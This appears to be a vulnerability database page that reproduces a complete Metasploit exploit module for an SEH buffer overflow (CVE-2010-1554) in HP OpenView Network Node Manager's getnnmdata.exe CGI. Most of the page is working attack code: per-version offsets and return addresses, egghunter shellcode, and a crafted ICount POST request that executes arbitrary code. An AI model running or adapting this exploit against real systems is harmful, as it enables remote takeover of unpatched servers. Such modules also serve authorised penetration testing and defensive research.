HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow

2011-03-2321:57:16

MC <[email protected]>

www.rapid7.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS

0.962

Percentile

99.6%

JSON

This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted ICount parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.
        By sending specially crafted ICount parameter to the getnnmdata.exe CGI,
        an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1554' ],
          [ 'OSVDB', '64976' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 750,
          'BadChars' => "\x00",
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'DisableNops' => 'True',
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ],
          [ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2010-05-11'))
  end

  def exploit

    egg = rand_text_alpha_upper(4)

    hunter =  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    hunter << "\xef\xb8" + egg + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

    boom =  rand_text_alpha_upper(target['Offset'])
    boom << generate_seh_record(target.ret)
    boom << hunter + egg + egg
    boom << payload.encoded
    boom << rand_text_alpha_upper(9024 - payload.encoded.length)

    sploit =  "SnmpVals=&ICount=-9#{boom}"

    print_status("Trying target #{target.name}...")

    send_request_cgi({
      'uri'		=> '/OvCgi/getnnmdata.exe',
      'method'	=> 'POST',
      'data'		=> sploit
      }, 8)

    handler

  end
end